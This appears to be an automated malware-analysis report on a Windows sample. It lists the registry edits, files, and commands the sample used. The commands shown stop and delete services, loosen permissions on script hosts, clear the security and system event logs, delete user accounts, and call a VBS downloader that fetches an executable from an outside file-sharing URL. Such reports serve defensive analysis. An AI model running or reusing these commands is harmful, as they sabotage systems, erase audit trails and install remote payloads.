Technical Information
To ensure autorun and distribution
Modifies the following registry keys
- [<HKLM>\Software\Classes\VBSFile\Shell\Open\Command] '' = '%WINDIR%\SysWow64\WScript.exe "%1" %*'
Malicious functions
Executes the following
- '%WINDIR%\syswow64\net.exe' stop lanmanserver /y
- '%WINDIR%\syswow64\net.exe' stop mssecsvc2.0
- '%WINDIR%\syswow64\net.exe' stop mssecsvc2.1
- '%WINDIR%\syswow64\net.exe' stop COMSysCts
- '%WINDIR%\syswow64\net.exe' stop WmiAppSrv
- '%WINDIR%\syswow64\net.exe' stop Bcdefg
- '%WINDIR%\syswow64\net.exe' stop WSSDPSRVS
- '%WINDIR%\syswow64\taskkill.exe' /f /t /im cscript.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /t /im wscript.exe
Modifies file system
Creates the following files
- %WINDIR%\temp\vbs.reg
- %WINDIR%\temp\dllss.bat
- <Current directory>\tem.vbs
- <Current directory>\xxoo.vbs
Sets the 'hidden' attribute to the following files
- <Current directory>\tem.vbs
Deletes the following files
- <Current directory>\tem.vbs
Deletes itself.
Network activity
UDP
- DNS ASK no##.youdao.com
Miscellaneous
Searches for the following windows
- ClassName: 'RegEdit_RegEdit' WindowName: ''
- ClassName: '' WindowName: ''
Creates and executes the following
- '%WINDIR%\syswow64\wscript.exe' "<Current directory>\tem.vbs"
- '%WINDIR%\syswow64\cmd.exe' /c regedit /s %WINDIR%\temp\vbs.reg' (with hidden window)
- '%WINDIR%\syswow64\sc.exe' delete SSDPSRVS' (with hidden window)
- '%WINDIR%\syswow64\net.exe' stop WSSDPSRVS' (with hidden window)
- '%WINDIR%\syswow64\sc.exe' delete Bcdefg' (with hidden window)
- '%WINDIR%\syswow64\net.exe' stop Bcdefg' (with hidden window)
- '%WINDIR%\syswow64\sc.exe' delete WmiAppSrv' (with hidden window)
- '%WINDIR%\syswow64\net.exe' stop WmiAppSrv' (with hidden window)
- '%WINDIR%\syswow64\sc.exe' delete COMSysCts' (with hidden window)
- '%WINDIR%\syswow64\net.exe' stop COMSysCts' (with hidden window)
- '%WINDIR%\syswow64\sc.exe' delete mssecsvc2.1' (with hidden window)
- '%WINDIR%\syswow64\net.exe' stop mssecsvc2.1' (with hidden window)
- '%WINDIR%\syswow64\sc.exe' delete mssecsvc2.0' (with hidden window)
- '%WINDIR%\syswow64\net.exe' stop mssecsvc2.0' (with hidden window)
- '%WINDIR%\syswow64\sc.exe' delete lanmanserver' (with hidden window)
- '%WINDIR%\syswow64\sc.exe' config lanmanserver start= DISABLED 2>nul' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c %WINDIR%\TEMP\dllss.bat' (with hidden window)
- '%WINDIR%\syswow64\net.exe' stop lanmanserver /y' (with hidden window)
Executes the following
- '%WINDIR%\syswow64\sc.exe' config lanmanserver start= DISABLED 2>nul
- '%WINDIR%\syswow64\net1.exe' stop mssecsvc2.1
- '%WINDIR%\syswow64\cacls.exe' <SYSTEM32>\cscript.exe /g everyone:f
- '%WINDIR%\syswow64\cacls.exe' <SYSTEM32>\wscript.exe /g everyone:f
- '%WINDIR%\syswow64\reg.exe' delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe" /f
- '%WINDIR%\syswow64\reg.exe' delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe" /f
- '%WINDIR%\syswow64\wevtutil.exe' cl "windows powershell"
- '%WINDIR%\syswow64\wevtutil.exe' cl "security"
- '%WINDIR%\syswow64\wevtutil.exe' cl "system"
- '%WINDIR%\syswow64\reg.exe' delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" /f
- '%WINDIR%\syswow64\net.exe' user mm123$ /del
- '%WINDIR%\syswow64\net1.exe' user mm123$ /del
- '%WINDIR%\syswow64\net.exe' user admin$ /del
- '%WINDIR%\syswow64\net1.exe' user admin$ /del
- '%WINDIR%\syswow64\net.exe' user aliyun /del
- '%WINDIR%\syswow64\net1.exe' user aliyun /del
- '%WINDIR%\syswow64\net.exe' user lcy /del
- '%WINDIR%\syswow64\net1.exe' user lcy /del
- '%WINDIR%\syswow64\reg.exe' delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\smss.exe" /f
- '%WINDIR%\syswow64\reg.exe' delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sqlser.exe" /f
- '%WINDIR%\syswow64\cacls.exe' %WINDIR%\SysWOW64\wscript.exe /g everyone:f
- '%WINDIR%\syswow64\reg.exe' delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\svchost.exe" /f
- '%WINDIR%\syswow64\cacls.exe' %WINDIR%\SysWOW64\cscript.exe /g everyone:f
- '%WINDIR%\syswow64\net1.exe' stop COMSysCts
- '%WINDIR%\syswow64\sc.exe' delete lanmanserver
- '%WINDIR%\syswow64\sc.exe' delete mssecsvc2.0
- '%WINDIR%\syswow64\sc.exe' delete mssecsvc2.1
- '%WINDIR%\syswow64\sc.exe' delete COMSysCts
- '%WINDIR%\syswow64\sc.exe' delete WmiAppSrv
- '%WINDIR%\syswow64\sc.exe' delete Bcdefg
- '%WINDIR%\syswow64\sc.exe' delete SSDPSRVS
- '%WINDIR%\syswow64\cmd.exe' /c regedit /s %WINDIR%\temp\vbs.reg
- '%WINDIR%\syswow64\cmd.exe' /c %WINDIR%\TEMP\dllss.bat
- '%WINDIR%\syswow64\sc.exe' stop "Evemt Windows"
- '%WINDIR%\syswow64\regedit.exe' /s %WINDIR%\temp\vbs.reg
- '%WINDIR%\syswow64\sc.exe' delete "Evemt Windows"
- '%WINDIR%\syswow64\net1.exe' stop WmiAppSrv
- '%WINDIR%\syswow64\attrib.exe' +s +h +r %WINDIR%\Fonts\Windows
- '%WINDIR%\syswow64\cmd.exe' /S /D /c" echo y"
- '%WINDIR%\syswow64\cacls.exe' %WINDIR%\Fonts\Windows /d everyone
- '%WINDIR%\syswow64\net1.exe' stop Bcdefg
- '%WINDIR%\syswow64\net1.exe' stop mssecsvc2.0
- '%WINDIR%\syswow64\net1.exe' stop WSSDPSRVS
- '%WINDIR%\syswow64\net1.exe' stop lanmanserver /y
- '%WINDIR%\syswow64\cscript.exe' xxoo.vbs "http://no##.youdao.com/yws/api/personal/file/WEB9582c940624e9219810ac5a73cf78f60?me###################################################################" %WINDIR%\Temp\dlls.exe
